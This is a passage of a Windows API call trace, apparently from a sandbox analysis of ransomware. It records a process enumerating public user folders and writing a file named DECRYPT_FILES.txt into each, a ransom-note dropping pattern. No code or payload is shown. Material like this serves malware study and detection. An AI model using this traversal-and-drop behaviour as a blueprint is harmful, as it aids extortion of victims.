lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0054.160] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0054.160] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0054.160] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents", lpFilePart=0x0) returned 0x19 [0054.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x0) returned 0x1a [0054.160] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.160] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.161] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.161] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0054.161] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0054.161] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0054.161] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.161] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.161] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x2b [0054.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0edd20) returned 1 [0054.162] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\DECRYPT_FILES.txt" (normalized: "c:\\users\\public\\documents\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.162] GetFileType (hFile=0x408) returned 0x1 [0054.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edc90) returned 1 [0054.162] GetFileType (hFile=0x408) returned 0x1 [0054.162] WriteFile (in: hFile=0x408, lpBuffer=0x21e6328*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0edd68, lpOverlapped=0x0 | out: lpBuffer=0x21e6328*, lpNumberOfBytesWritten=0x1c0edd68*=0x9d5, lpOverlapped=0x0) returned 1 [0054.163] CloseHandle (hObject=0x408) returned 1 [0054.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.164] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads", lpFilePart=0x0) returned 0x19 [0054.164] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads\\", lpFilePart=0x0) returned 0x1a [0054.164] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.164] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.164] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.165] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.165] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.165] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads", lpFilePart=0x0) returned 0x19 [0054.165] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads\\", lpFilePart=0x0) returned 0x1a [0054.165] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.165] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.165] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.165] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0054.166] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.166] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x2b [0054.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0edd20) returned 1 [0054.166] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\DECRYPT_FILES.txt" (normalized: "c:\\users\\public\\downloads\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.166] GetFileType (hFile=0x408) returned 0x1 [0054.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edc90) returned 1 [0054.166] GetFileType (hFile=0x408) returned 0x1 [0054.166] WriteFile (in: hFile=0x408, lpBuffer=0x21e9f70*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0edd68, lpOverlapped=0x0 | out: lpBuffer=0x21e9f70*, lpNumberOfBytesWritten=0x1c0edd68*=0x9d5, lpOverlapped=0x0) returned 1 [0054.167] CloseHandle (hObject=0x408) returned 1 [0054.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.167] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries", lpFilePart=0x0) returned 0x19 [0054.168] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\", lpFilePart=0x0) returned 0x1a [0054.168] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.168] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.168] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.168] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0054.168] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.168] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.169] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries", lpFilePart=0x0) returned 0x19 [0054.169] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\", lpFilePart=0x0) returned 0x1a [0054.169] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.169] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.169] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.169] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0054.169] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0 [0054.170] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.170] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x2b [0054.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0edd20) returned 1 [0054.170] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\DECRYPT_FILES.txt" (normalized: "c:\\users\\public\\libraries\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x404 [0054.171] GetFileType (hFile=0x404) returned 0x1 [0054.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edc90) returned 1 [0054.171] GetFileType (hFile=0x404) returned 0x1 [0054.172] WriteFile (in: hFile=0x404, lpBuffer=0x21edfd8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0edd68, lpOverlapped=0x0 | out: lpBuffer=0x21edfd8*, lpNumberOfBytesWritten=0x1c0edd68*=0x9d5, lpOverlapped=0x0) returned 1 [0054.173] CloseHandle (hObject=0x404) returned 1 [0054.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.173] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV", lpFilePart=0x0) returned 0x1b [0054.173] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\", lpFilePart=0x0) returned 0x1c [0054.173] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de090 [0054.173] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.174] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.174] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0054.174] FindNextFileW (in: hFindFile=0x1a5de090, 